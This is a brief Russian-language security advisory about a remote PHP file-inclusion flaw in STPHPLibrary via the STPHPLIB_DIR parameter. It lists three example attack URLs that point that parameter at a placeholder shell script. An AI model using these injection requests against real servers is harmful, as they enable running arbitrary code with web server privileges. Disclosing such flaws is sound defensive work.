Программа: STPHPLibrary
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «STPHPLIB_DIR» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]
